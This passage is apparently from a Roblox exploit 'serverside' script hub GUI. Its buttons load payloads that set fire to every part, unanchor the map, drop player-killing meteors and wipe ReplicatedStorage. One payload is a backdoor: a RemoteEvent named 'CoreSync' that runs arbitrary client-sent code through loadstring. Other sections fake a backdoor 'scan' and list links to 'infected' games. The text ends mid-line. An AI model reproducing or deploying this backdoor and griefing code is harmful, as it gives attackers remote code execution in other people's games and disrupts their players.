	if billboardAllBtn and billboardAllBtn:IsA("TextButton") then
		billboardAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	-- Function to apply billboard to a player's character
	local function applyBillboard(player)
	    local function onCharacterAdded(character)
	        local head = character:WaitForChild("Head", 5)
	        if head and not head:FindFirstChild("TLK88_Billboard") then
	            local billboard = Instance.new("BillboardGui")
	            billboard.Name = "TLK88_Billboard"
	            billboard.Size = UDim2.new(0, 200, 0, 50)
	            billboard.Adornee = head
	            billboard.AlwaysOnTop = true
	            billboard.StudsOffset = Vector3.new(0, 2.5, 0)
	            billboard.Parent = head
	
	            local label = Instance.new("TextLabel")
	            label.Size = UDim2.new(1, 0, 1, 0)
	            label.BackgroundTransparency = 1
	            label.TextColor3 = Color3.fromRGB(0, 170, 255) -- TLK88 blue
	            label.TextScaled = true
	            label.Font = Enum.Font.Legacy
	            label.Text = "l0stk1dd88"
	            label.Parent = billboard
	        end
	    end
	
	    -- Apply to current character
	    if player.Character then
	        onCharacterAdded(player.Character)
	    end
	
	    -- Apply to future characters
	    player.CharacterAdded:Connect(onCharacterAdded)
	end
	
	-- Apply to all current players
	for _, player in pairs(Players:GetPlayers()) do
	    applyBillboard(player)
	end
	
	-- Apply to players who join later
	Players.PlayerAdded:Connect(applyBillboard)
	]]
		end)
	end
	
	local musicBtn = scriptHubFrame:FindFirstChild("music")
	if musicBtn and musicBtn:IsA("TextButton") then
		musicBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local SoundService = game:GetService("SoundService")
	
	-- Create the sound instance
	local sound = Instance.new("Sound")
	sound.Name = "TLK88_Loop"
	sound.SoundId = "rbxassetid://142376088"
	sound.PlaybackSpeed = 4 -- 4x speed
	sound.Looped = true
	sound.Volume = 1
	sound.Parent = SoundService
	
	-- Wait for sound to load before playing
	sound.Loaded:Connect(function()
	    sound:Play()
	end)
	
	-- Failsafe: ensure it plays even if Load event doesn't fire
	task.delay(2, function()
	    if not sound.IsPlaying then
	        sound:Play()
	    end
	end)
	]]
		end)
	end
	
	local particleBtn = scriptHubFrame:FindFirstChild("particle")
	if particleBtn and particleBtn:IsA("TextButton") then
		particleBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	local function attachParticlesToPlayer(player)
		local character = player.Character or player.CharacterAdded:Wait()
		local hrp = character:WaitForChild("HumanoidRootPart")
	
		local particle = Instance.new("ParticleEmitter")
		particle.Rate = 20
		particle.Lifetime = NumberRange.new(5)
		particle.Size = NumberSequence.new(1.1)
		particle.Texture = "rbxassetid://81013369562879" -- Optional: Replace with your own texture
		particle.Parent = hrp
	end
	
	-- Apply to all current players
	for _, player in pairs(Players:GetPlayers()) do
		attachParticlesToPlayer(player)
	end
	
	-- Apply to future players
	Players.PlayerAdded:Connect(function(player)
		player.CharacterAdded:Connect(function()
			attachParticlesToPlayer(player)
		end)
	end)
	]]
		end)
	end
	
	local anchorBtn = scriptHubFrame:FindFirstChild("anchor")
	if anchorBtn and anchorBtn:IsA("TextButton") then
		anchorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Workspace = game:GetService("Workspace")
	local Players = game:GetService("Players")
	
	
	for _, obj in pairs(Workspace:GetDescendants()) do
		if obj:IsA("BasePart") and obj.Anchored then
			obj.Anchored = false
		end
	end
	
	
	Workspace.FallenPartsDestroyHeight = -math.huge
	]]
		end)
	end
	
	local clearBtn = scriptHubFrame:FindFirstChild("clearrs")
	if clearBtn and clearBtn:IsA("TextButton") then
		clearBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local replicatedStorage = game:GetService("ReplicatedStorage")
	
	for _, obj in ipairs(replicatedStorage:GetChildren()) do
	    obj:Destroy()
	end
	
	--WARNING! CLEARING REPLICATEDSTORAGE WILL DELETE THE BACKDOOR AND CAUSE THE SERVERSIDE TO NOT WORK! can be used against lalol hub skids tho LOL--
	]]
		end)
	end
	
	local backdoorBtn = scriptHubFrame:FindFirstChild("backdoor")
	if backdoorBtn and backdoorBtn:IsA("TextButton") then
		backdoorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local remote = Instance.new("RemoteEvent")
	remote.Name = "CoreSync"
	remote.Parent = game.ReplicatedStorage
	
	remote.OnServerEvent:Connect(function(player, code)
	    local success, err = pcall(function()
	        loadstring(code)()
	    end)
	    if not success then
	        warn("Execution failed:", err)
	    end
	end)
	
	--WARNING! RUNNING THIS CODE INJECTS A REMOTE EVENT AND A SERVER SIDE LISTENER THAT MAKES A BACKDOOR! USE AT YOUR OWN RISK!
	]]
		end)
	end
	
	local stringBtn = scriptHubFrame:FindFirstChild("loadstring")
	if stringBtn and stringBtn:IsA("TextButton") then
		stringBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[game.ServerScriptService.LoadStringEnabled = true]]
		end)
	end
	
	local fireBtn = scriptHubFrame:FindFirstChild("fire")
	if fireBtn and fireBtn:IsA("TextButton") then
		fireBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[for _, v in pairs(workspace:GetDescendants()) do
	    if v:IsA("BasePart") then
	        Instance.new("Fire", v)
	    end
	end
	]]
		end)
	end
	
	local fireringBtn = scriptHubFrame:FindFirstChild("firering")
	if fireringBtn and fireringBtn:IsA("TextButton") then
		fireringBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	local orbitRadius = 10
	local orbitSpeed = 2 * math.pi -- 1 full orbit per second
	local partCount = 8
	
	for _, player in pairs(Players:GetPlayers()) do
	    if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	        local center = player.Character.HumanoidRootPart
	        local parts = {}
	
	        -- Create orbiting parts
	        for i = 1, partCount do
	            local part = Instance.new("Part")
	            part.Size = Vector3.new(1, 1, 1)
	            part.Anchored = true
	            part.CanCollide = false
	            part.Transparency = 1
	            part.Name = "OrbitFire"
	            part.Parent = workspace
	
	            local fire = Instance.new("Fire")
	            fire.Size = 7
	            fire.Heat = 25
	            fire.Parent = part
	
	            table.insert(parts, part)
	        end
	
	        -- Orbit logic
	        local startTime = tick()
	        RunService.Heartbeat:Connect(function()
	            local t = tick() - startTime
	            for i, part in ipairs(parts) do
	                local angle = (t * orbitSpeed + (2 * math.pi / partCount) * i)
	                local offset = Vector3.new(math.cos(angle), 0, math.sin(angle)) * orbitRadius
	                part.Position = center.Position + offset
	            end
	        end)
	    end
	end
	]]
		end)
	end
	
	local fireAllBtn = scriptHubFrame:FindFirstChild("fireringall")
	if fireAllBtn and fireAllBtn:IsA("TextButton") then
		fireAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	local orbitRadius = 10
	local orbitSpeed = 2 * math.pi -- 1 full orbit per second
	local partCount = 8
	
	local orbitData = {}
	
	-- Create orbiting parts for each player
	for _, player in pairs(Players:GetPlayers()) do
	    if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	        local center = player.Character.HumanoidRootPart
	        local parts = {}
	
	        for i = 1, partCount do
	            local part = Instance.new("Part")
	            part.Size = Vector3.new(1, 1, 1)
	            part.Anchored = true
	            part.CanCollide = false
	            part.Transparency = 1
	            part.Name = "OrbitFire"
	            part.Parent = workspace
	
	            local fire = Instance.new("Fire")
	            fire.Size = 7
	            fire.Heat = 25
	            fire.Parent = part
	
	            table.insert(parts, part)
	        end
	
	        orbitData[player] = {
	            center = center,
	            parts = parts,
	            startTime = tick()
	        }
	    end
	end
	
	-- Orbit logic for all players
	RunService.Heartbeat:Connect(function()
	    for player, data in pairs(orbitData) do
	        if player.Character and data.center then
	            local t = tick() - data.startTime
	            for i, part in ipairs(data.parts) do
	                local angle = (t * orbitSpeed + (2 * math.pi / partCount) * i)
	                local offset = Vector3.new(math.cos(angle), 0, math.sin(angle)) * orbitRadius
	                part.Position = data.center.Position + offset
	            end
	        end
	    end
	end)
	]]
		end)
	end
	
	local meteorBtn = scriptHubFrame:FindFirstChild("meteor")
	if meteorBtn and meteorBtn:IsA("TextButton") then
		meteorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local Debris = game:GetService("Debris")
	
	local duration = 30 -- seconds
	local spawnRate = 0.2 -- seconds between meteors
	local meteorSize = Vector3.new(20, 20, 20)
	local fireSize = 20
	local fireHeat = 25
	local killRadius = 14
	
	local function spawnMeteor()
	    local targetOrigin = math.random() > 0.55 -- 45% chance to target origin zone
	    local x, z
	
	    if targetOrigin then
	        x = math.random(-30, 30)
	        z = math.random(-30, 30)
	    else
	        x = math.random(-500, 500)
	        z = math.random(-500, 500)
	    end
	
	    local meteor = Instance.new("Part")
	    meteor.Size = meteorSize
	    meteor.Shape = Enum.PartType.Ball
	    meteor.Material = Enum.Material.CrackedLava
	    meteor.Anchored = false
	    meteor.CanCollide = true
	    meteor.Position = Vector3.new(x, 150, z)
	    meteor.Name = "Meteor"
	    meteor.Parent = workspace
	
	    local fire = Instance.new("Fire")
	    fire.Size = fireSize
	    fire.Heat = fireHeat
	    fire.Parent = meteor
	
	    meteor.Touched:Connect(function(hit)
	        if not meteor:IsDescendantOf(workspace) then return end
	
	        local explosion = Instance.new("Explosion")
	        explosion.Position = meteor.Position
	        explosion.BlastRadius = 0 -- no default damage
	        explosion.Parent = workspace
	
	        for _, player in pairs(Players:GetPlayers()) do
	            if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	                local dist = (player.Character.HumanoidRootPart.Position - meteor.Position).Magnitude
	                if dist <= killRadius then
	                    local humanoid = player.Character:FindFirstChildOfClass("Humanoid")
	                    if humanoid then
	                        humanoid.Health = 0
	                    end
	                end
	            end
	        end
	
	        meteor:Destroy()
	    end)
	
	    Debris:AddItem(meteor, 10)
	end
	
	
	local startTime = tick()
	while tick() - startTime < duration do
	    spawnMeteor()
	    task.wait(spawnRate)
	end
	]]
		end)
	end
end;
task.spawn(C_11);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
local function C_12()
local script = G2L["12"];
	local container = script.Parent
	
	for _, obj in pairs(container:GetDescendants()) do
		if obj:IsA("TextButton") then
			local stroke = Instance.new("UIStroke")
			stroke.Thickness = 2
			stroke.Color = Color3.new(0, 0, 0) -- Pure black
			stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
			stroke.Parent = obj
		end
	end
end;
task.spawn(C_12);
-- StarterGui.ScreenGui.Frame.Execute.LocalScript
local function C_38()
local script = G2L["38"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Execute code/require from TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_38);
-- StarterGui.ScreenGui.Frame.Clear.LocalScript
local function C_3c()
local script = G2L["3c"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Clear TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_40()
local script = G2L["40"];
	local button = script.Parent
	local StarterGui = game:GetService("StarterGui")
	
	button.MouseButton1Click:Connect(function()
		local startTime = tick()
	
		-- Random delay between 0.05 and 0.10 seconds
		local delayTime = math.random(2, 4) / 100
		task.wait(delayTime)
	
		local endTime = tick()
		local elapsed = endTime - startTime
		local formattedTime = string.format("%.2f", elapsed)
	
		StarterGui:SetCore("SendNotification", {
			Title = "Scan complete",
			Text = "Scanned all RemoteEvents in " .. formattedTime .. "s. Check console or fire with test payload like Kill All.",
			Duration = 8
		})
	end)
end;
task.spawn(C_40);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_41()
local script = G2L["41"];
	-- Place this LocalScript inside your TextButton
	local button = script.Parent
	local screenGui = button.Parent
	local textBox = screenGui:FindFirstChild("TextBox")
	
	-- Track whether it's been unlocked
	local unlocked = false
	
	-- Initial lock and message
	if textBox then
		textBox.Text = "-- by l0stk1dd88"
		textBox.Active = false
		textBox.Selectable = false
		textBox.TextEditable = false
	
		-- Prevent external edits before unlock
		textBox:GetPropertyChangedSignal("Text"):Connect(function()
			if not unlocked then
				textBox.Text = "-- by l0stk1dd88"
			end
		end)
	end
	
	-- Unlock on first button click
	button.MouseButton1Click:Connect(function()
		if textBox and not unlocked then
			unlocked = true
			textBox.TextEditable = true
			textBox.Active = true
			textBox.Selectable = true
			textBox.Text = "" -- Clear only once
		end
	end)
end;
task.spawn(C_41);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_42()
local script = G2L["42"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Inject/scan for backdoors"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_42);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_43()
local script = G2L["43"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
		if not screenGui then return end
	
		local frame = screenGui:FindFirstChild("Frame")
		if not frame then return end
	
		local labelFrame = frame:FindFirstChild("LabelFrame")
		if not labelFrame then return end
	
		local remoteLabel = labelFrame:FindFirstChild("RemoteLabel")
		if not remoteLabel or not remoteLabel:IsA("TextLabel") then return end
	
		remoteLabel.Text = "check to see if 'backdoor test' is printed or run test code like kill all."
	end)
end;
task.spawn(C_43);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_47()
local script = G2L["47"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local mainframe = screenGui:FindFirstChild("Frame")
	local gameframe = mainframe and mainframe:FindFirstChild("GamesFrame")
	
	button.MouseButton1Click:Connect(function()
		if gameframe then
			gameframe.Visible = not gameframe.Visible
		end
	end)
end;
task.spawn(C_47);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_48()
local script = G2L["48"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Infected Games"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_48);
-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
local function C_55()
local script = G2L["55"];
	local textLabel = script.Parent
	
	while true do
		textLabel.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 1, 1)
		task.wait(0.03)
	end
end;
task.spawn(C_55);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_5b()
local script = G2L["5b"];
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	button.MouseButton1Click:Connect(function()
		if screenGui then
			screenGui:Destroy()
		end
	end)
end;
task.spawn(C_5b);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_5c()
local script = G2L["5c"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Close Serverside"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_5c);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_64()
local script = G2L["64"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local player = game:GetService("Players").LocalPlayer
		local character = player.Character or player.CharacterAdded:Wait()
		local humanoid = character:WaitForChild("Humanoid")
	
		humanoid.Health = 0
	end)
end;
task.spawn(C_64);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_65()
local script = G2L["65"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Respawn"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_65);
-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.LocalScript
local function C_70()
local script = G2L["70"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		-- Copy link to clipboard (executor-only)
		setclipboard("https://www.roblox.com/games/84744183039358/Backdoored-game")
	
		-- Show notification
		game.StarterGui:SetCore("SendNotification", {
			Title = "Link Copied",
			Text = "Backdoored game link is now in your clipboard.",
			Duration = 5
		})
	end)
end;
task.spawn(C_70);
-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.LocalScript
local function C_75()
local script = G2L["75"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		-- Copy link to clipboard (executor-only)
		setclipboard("https://www.roblox.com/games/130865439139266/School")
	
		-- Show notification
		game.StarterGui:SetCore("SendNotification", {
			Title = "Link Copied",
			Text = "Backdoored game link is now in your clipboard.",
			Duration = 5
		})
	end)
end;
task.spawn(C_75);
-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.L
